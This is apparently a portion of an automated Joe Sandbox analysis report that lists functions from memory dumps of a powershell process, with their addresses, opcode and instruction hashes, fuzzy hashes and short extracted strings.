                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7298f949563d4eb0392bcf7866530b6012b9691c4910926c7525dc8ffd6f216f
                                        • Instruction ID: e4b0e4244b2291cb0c2cdfeb010e8ae06c0f1525cf0cff2b84f13b38fae7a64a
                                        • Opcode Fuzzy Hash: 7298f949563d4eb0392bcf7866530b6012b9691c4910926c7525dc8ffd6f216f
                                        • Instruction Fuzzy Hash: E5412631F043008FDBA5AF248A41B767FE6AF84260B1484B6F9019FA92D735DA40C7F5
                                        Function 046AF5B4 Relevance: .1, Instructions: 121COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 884400a80876539d4a153e037eb302afe9a257ff628cf463df73e33a9a428428
                                        • Instruction ID: 9fea9f8f72b58b21fcb5b4af2990f1b3b46ce4df0c26211f566bf80e85d8d6e2
                                        • Opcode Fuzzy Hash: 884400a80876539d4a153e037eb302afe9a257ff628cf463df73e33a9a428428
                                        • Instruction Fuzzy Hash: 1A513E357002098FCB08DF68D584ADD7BB6BF88314F189554D401AB3A6EB74ED95CFA1
                                        Function 046ABB20 Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec856bdbb878276292df439a01fb799ca384140bb0f2b52697f5b042953b47a9
                                        • Instruction ID: 922f54e643fc242db17c98058a20042d6033b01cbc6e050b907caabe60c0bd3a
                                        • Opcode Fuzzy Hash: ec856bdbb878276292df439a01fb799ca384140bb0f2b52697f5b042953b47a9
                                        • Instruction Fuzzy Hash: F1412274A002049FDB04DF79D5957AEBAFBEF88310F14C469D809AB396DF75AC418BA0
                                        Function 046A3060 Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18ff5034c889283da13f49693eadfe6b5bdc851bdda5a06eea1ab1fcaaaac132
                                        • Instruction ID: 42135c354a95b97b4abd8b7181f46c11c83699a51cdd7b3168d613857417fb69
                                        • Opcode Fuzzy Hash: 18ff5034c889283da13f49693eadfe6b5bdc851bdda5a06eea1ab1fcaaaac132
                                        • Instruction Fuzzy Hash: E5413674A005059FCB09CF58C5989AAFBB1FF48310B218569D905AB365D732FCA0CFA4
                                        Function 06F40D59 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24470a0c16c5282c77bfec7c239f1f875ca786f728e77fca5518107f375e9889
                                        • Instruction ID: 02aeabc5a9d9b9d15bf2e832af6a73b4fe6bb49b543786bc040a9cf52db3eec7
                                        • Opcode Fuzzy Hash: 24470a0c16c5282c77bfec7c239f1f875ca786f728e77fca5518107f375e9889
                                        • Instruction Fuzzy Hash: B8215A32F042009FD7606F2895417BABFB29FC1250F0880BAD601DBA92DF75CA55CBE1
                                        Function 00ABEEA8 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83a9617cc88ee3c370df05db0eb36f4aebaf1c9d1883a3b2fdfb5a3802c0efa9
                                        • Instruction ID: 26759d030a04842569d5828dee4150d75add3c9d2946f2e1e2c56acca7be7a07
                                        • Opcode Fuzzy Hash: 83a9617cc88ee3c370df05db0eb36f4aebaf1c9d1883a3b2fdfb5a3802c0efa9
                                        • Instruction Fuzzy Hash: A521F171504200EFDF05CF64C9C0BA6BFA9FB98314F24C5ADE9094A257C33AD816CBA1
                                        Function 00ABEEA3 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f6ba4cb34606b45c937968ea3da66db6d96b22f44110943821d25d444f24cb6
                                        • Instruction ID: f5171dce147553602751e784156769c92a8228d729f13d1de374b1db149327b3
                                        • Opcode Fuzzy Hash: 1f6ba4cb34606b45c937968ea3da66db6d96b22f44110943821d25d444f24cb6
                                        • Instruction Fuzzy Hash: D921CD76504280DFCF06CF20C9C4B66BF62FB48314F24C5A9E9094A257C33AD86ACBA1
                                        Function 046AD9B0 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1f7e42146c676d512500ef4f90a7805663cc62e720b9ed14515b5ec7680b465
                                        • Instruction ID: ed9c3f72d3784514b2dd0c41b24116b65a6df9a998bcc89c12b88d369b82920e
                                        • Opcode Fuzzy Hash: a1f7e42146c676d512500ef4f90a7805663cc62e720b9ed14515b5ec7680b465
                                        • Instruction Fuzzy Hash: ED01D1B93009109FC7466738A4195AE3BABEFC9726315405AE507C3741DE38AC06CBA2
                                        Function 00ABD01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcf32c7b109afb9fbe02a2d08b879a558e32fdbbd13444ec72592763baac47d1
                                        • Instruction ID: fc061668db0f0cc1cf4e04de7a5c16c35d2ecb507fae35aee18e8cbe878848ba
                                        • Opcode Fuzzy Hash: fcf32c7b109afb9fbe02a2d08b879a558e32fdbbd13444ec72592763baac47d1
                                        • Instruction Fuzzy Hash: 6F0126310053009AE720AB29CD84BA7FFACEF46320F18C42AED4A0F247D2799C41CAB1
                                        Function 046AF7E4 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3b9ecacd07ed277ffe9bb7a0170bf4e4d8bf00c2047a9b952c0a8dd54f8e165
                                        • Instruction ID: 2d0c2c1097ef24ab30a42b455ef121aed84f6cccb6b2418d06130711f62abb29
                                        • Opcode Fuzzy Hash: c3b9ecacd07ed277ffe9bb7a0170bf4e4d8bf00c2047a9b952c0a8dd54f8e165
                                        • Instruction Fuzzy Hash: 12F0F6317046008FDB181BB5B8642A93F92FBD5345F04417BD04786265EE6CED17DB52
                                        Function 046AF768 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c88d431dd4f55cfb9f85788176ec7afe66e6323f2dddae82b032391fbc39411
                                        • Instruction ID: eee1b7537e53d063664186b6ee43a82bb68ffb77c4cd9906db4722101e5e1afb
                                        • Opcode Fuzzy Hash: 5c88d431dd4f55cfb9f85788176ec7afe66e6323f2dddae82b032391fbc39411
                                        • Instruction Fuzzy Hash: D4F0E2323062102BC705226968649EB7F6AEFEA210705413AE00AC7302EE1A9C0A82F2
                                        Function 046AF778 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d30417a72a8c0ba940e8b6e85b10fc3b9403fe82ce680a4c8c7d3945a97bcf0
                                        • Instruction ID: b337ec693572f022690c3b272214fdec5583e14ae8ce454951549f503d83c7ad
                                        • Opcode Fuzzy Hash: 3d30417a72a8c0ba940e8b6e85b10fc3b9403fe82ce680a4c8c7d3945a97bcf0
                                        • Instruction Fuzzy Hash: 0AF06D363006006BCB186779A464A6E77ABFFD9325F04453AD00A87354EF79EC0A8792
                                        Function 046AD9C0 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af056c237e71c857dc7358b57f3e5422877779f9ba25c084196399842dc571bd
                                        • Instruction ID: d8aa5150fae58b80c536f9d8208e917900adbbd972b47ec6c456726164065873
                                        • Opcode Fuzzy Hash: af056c237e71c857dc7358b57f3e5422877779f9ba25c084196399842dc571bd
                                        • Instruction Fuzzy Hash: DAF01DB53109109BC7456B38A05D52D7BEBEFC8765755805AE907C3750DE38AC02CB95
                                        Function 00ABD01C Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b48a901e73312558392d77d12afe7cf658cb144e960072b2142c0c1e941c00c5
                                        • Instruction ID: 559a5cf8a444d63df066f412069a4b6812067afe91d7ba53c32a376746f603b0
                                        • Opcode Fuzzy Hash: b48a901e73312558392d77d12afe7cf658cb144e960072b2142c0c1e941c00c5
                                        • Instruction Fuzzy Hash: D0F0CD71004344AEE7208B1AC884BA2FF9CEF52724F18C45AED491E287C27A9C40CAB0
                                        Function 046AD485 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a16bc9114d93047dbf59ef25cb99d9ff4702a1b6f386dbf8f466348dac898cb8
                                        • Instruction ID: 24d8a2179e3c959190b7c326b00ac423ed741b3d13bde4443c3bfd871b89e234
                                        • Opcode Fuzzy Hash: a16bc9114d93047dbf59ef25cb99d9ff4702a1b6f386dbf8f466348dac898cb8
                                        • Instruction Fuzzy Hash: 9CF0A77110A3428FC702CB789520464BF75EF4520471486DBD844CB652DB36ED17DB61
                                        Function 046AD498 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43f0883234b399dc5b7f6447966069e7fb7ef4674ca1434aa2bb1fd72897e4f7
                                        • Instruction ID: 4f65587514a7ce9b76a96ddbce06a593e7564c2cd3fc4f525128df3157204b83
                                        • Opcode Fuzzy Hash: 43f0883234b399dc5b7f6447966069e7fb7ef4674ca1434aa2bb1fd72897e4f7
                                        • Instruction Fuzzy Hash: 77E04F742003069BC711DB69E811965BBAEEB4824472485A9ED08CB305EF32FE17DBA0
                                        Function 046AFE80 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4291a577fba403a764d2ea340b4f88af153b1e34728f3d3fdc7bf0d74867cdad
                                        • Instruction ID: 7eebbe16291634f4ebf80eb9ba825ca873d46efd99a4bd29de8cc51381bd9fa9
                                        • Opcode Fuzzy Hash: 4291a577fba403a764d2ea340b4f88af153b1e34728f3d3fdc7bf0d74867cdad
                                        • Instruction Fuzzy Hash: 14E04870D4020A5F8740DFBC894155FFFF49B59100B548A69D958D3241FB7196538BD6
                                        Function 046AFDB8 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b86196dde492a2500111453af681ce8d3b0a538b2a1ae0a87b304681ebfe429a
                                        • Instruction ID: b331600f60c0e3614253e87064373a272e528194927084e1245c2f00c2b9c202
                                        • Opcode Fuzzy Hash: b86196dde492a2500111453af681ce8d3b0a538b2a1ae0a87b304681ebfe429a
                                        • Instruction Fuzzy Hash: 22E04F38D0514A8BCF09EB64E85A8EEBF74EE14315F00819DED5763651EA30199EDF82
                                        Function 046AFE90 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: d3064e2e0e622c419b30d0c8d47ef2492e1a82d1dd645ed9d533ed7355ac575c
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: CCD067B0D042099F8784EFADC94156EFBF4EB49200F6485AAD919E7301F7729A128FD1
                                        Function 046AFDC8 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a7d059f8f77cf2ca3efe8e70d256c8881121244421720199400bfbc4892ebb0
                                        • Instruction ID: 1ed22536e6f1d070793fb5a9335c14aeda23b86b2e535b405005e8f13bd69476
                                        • Opcode Fuzzy Hash: 0a7d059f8f77cf2ca3efe8e70d256c8881121244421720199400bfbc4892ebb0
                                        • Instruction Fuzzy Hash: FED0673890411A8BCB0CABA4E85A4BDBB74EE10205F40516EEA1752691BA30295FDF82

                                        Non-executed Functions

                                        Function 06F42708 Relevance: 12.8, Strings: 10, Instructions: 334COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$Vl$Vl
                                        • API String ID: 0-4126559129
                                        • Opcode ID: 94472b85f2895b3109a26a5a3a011de756d6c54e0ce26bc7097e38dc572552fc
                                        • Instruction ID: 8d6d0daf67e48c717b5aa4bad6973039772582533b1b176fce2b96ea51e186e5
                                        • Opcode Fuzzy Hash: 94472b85f2895b3109a26a5a3a011de756d6c54e0ce26bc7097e38dc572552fc
                                        • Instruction Fuzzy Hash: DFA16832B083049FD764AA6D980077ABFE6AFC1711F14847BF845CBA95DA36CA41C7A1
                                        Function 06F41810 Relevance: 12.8, Strings: 10, Instructions: 327COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$tP]q$tP]q$#Pk$$]q$$]q$$]q$Vl$Vl
                                        • API String ID: 0-4228332532
                                        • Opcode ID: 87734cf1c23b8fafdc79905125dab92eacdfc67ee5a5f00a106a773a48511a3d
                                        • Instruction ID: ba23f04b9b90b5a3733f1b9577c888d435cf46ff621626572ac98d732b3dc8db
                                        • Opcode Fuzzy Hash: 87734cf1c23b8fafdc79905125dab92eacdfc67ee5a5f00a106a773a48511a3d
                                        • Instruction Fuzzy Hash: 99A14932F083148FD765EA79981067ABFE6DFC2610B1484ABD445CB791DA36CC85C3E1
                                        Function 06F431E8 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TPk$0U]q$4']q$4']q$XY`l$XY`l$tP]q$tP]q
                                        • API String ID: 0-3785342527
                                        • Opcode ID: dba1ad4da7cb9f33275457892e8497dfbff3aa6361921fe1099c40f2464ed784
                                        • Instruction ID: 09370c7a033cec0e1b81ec54fc8ac198f52aa9f07ed792c4b6f603666e15375d
                                        • Opcode Fuzzy Hash: dba1ad4da7cb9f33275457892e8497dfbff3aa6361921fe1099c40f2464ed784
                                        • Instruction Fuzzy Hash: ACB14632F042148FE765AB6E984176AFFE6EFC5210F24C46AD509CBA55DE32CC41C7A1
                                        Function 06F42458 Relevance: 8.9, Strings: 7, Instructions: 190COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$$]q$$]q$$]q$Vl$Vl
                                        • API String ID: 0-1196443061
                                        • Opcode ID: f190d0cc92b461462ea7547328af6a29a71bedd595509f46d767968e2bf9eafb
                                        • Instruction ID: 0c13c81bfd64e8beaba407162b05679f8b3455fe99a53605c8d4c89232ca3e06
                                        • Opcode Fuzzy Hash: f190d0cc92b461462ea7547328af6a29a71bedd595509f46d767968e2bf9eafb
                                        • Instruction Fuzzy Hash: AB516732F043058FDB65AA2D8820776BFF6EFC2250F14847BE845C7A66DA35CA41C7A1
                                        Function 06F45390 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                        • API String ID: 0-2353078639
                                        • Opcode ID: 6cd2ea5f738b636727db67fda7d2847ada6ab41a9099e052e5bf2f8856ad9e07
                                        • Instruction ID: 285d719e58c460f90a9beb9593247a1dff14c88d32adab586b11a3c596efc918
                                        • Opcode Fuzzy Hash: 6cd2ea5f738b636727db67fda7d2847ada6ab41a9099e052e5bf2f8856ad9e07
                                        • Instruction Fuzzy Hash: FC414932F00305CFDB65BE6D985067ABFE6BF80251F24846AC844CB621EB35C815C7A1
                                        Function 06F44C80 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q
                                        • API String ID: 0-1785108022
                                        • Opcode ID: 1751b4f9cc9bb71df6cced8f9ed210b06faed176735f056bdd39e630362a07c0
                                        • Instruction ID: dd41d8fe26f2b75d8625db1e35d3699d0801894eb24b35972d36d0de6af9dff3
                                        • Opcode Fuzzy Hash: 1751b4f9cc9bb71df6cced8f9ed210b06faed176735f056bdd39e630362a07c0
                                        • Instruction Fuzzy Hash: 79812532F002198FCB64EB2C94107AABFF6EFC1211B2585BAD445EBA51DB31D845C7E2
                                        Function 06F406B0 Relevance: 5.2, Strings: 4, Instructions: 247COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q
                                        • API String ID: 0-1785108022
                                        • Opcode ID: 360dcfe6dab1aeb5ec28c067882a8f53af6961b5df354684010e6a511f75b2f4
                                        • Instruction ID: 084ede062a8807bf48e43c909298b4a59b61246fe3245f9257a1a05b5349a3e3
                                        • Opcode Fuzzy Hash: 360dcfe6dab1aeb5ec28c067882a8f53af6961b5df354684010e6a511f75b2f4
                                        • Instruction Fuzzy Hash: 2C815531F082059FDB65AB2895002BA7FA69FC1210F1484BACA45DF695DF36C841C7E2
                                        Function 06F444A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q$$]q$$]q
                                        • API String ID: 0-858218434
                                        • Opcode ID: 082cacf652d8e431c25e538bfed5fa460ca47043ccd11687d7f7378831522920
                                        • Instruction ID: 482be15b492ab75fcd73296ab35a154ff10b2c44f4a9386ebf2e227051791109
                                        • Opcode Fuzzy Hash: 082cacf652d8e431c25e538bfed5fa460ca47043ccd11687d7f7378831522920
                                        • Instruction Fuzzy Hash: C0214931B002045FEFB8A96E9840B36BFDAEFC0751F24842AD905EBA85CD35C801C371
                                        Function 06F40309 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$$]q$$]q
                                        • API String ID: 0-978391646
                                        • Opcode ID: a595eb4a31af696d2280cc276584f4b17d6e29166868190f6d8e5b5bce01a2a4
                                        • Instruction ID: 328661132b612b3af6afc7d885dd6ed846e33c5f4f786459585060adeaeb471f
                                        • Opcode Fuzzy Hash: a595eb4a31af696d2280cc276584f4b17d6e29166868190f6d8e5b5bce01a2a4
                                        • Instruction Fuzzy Hash: 54019E2270E3914FE32B22281821A666FBA8FC390031A88E7D481CF297CD184C09C3B7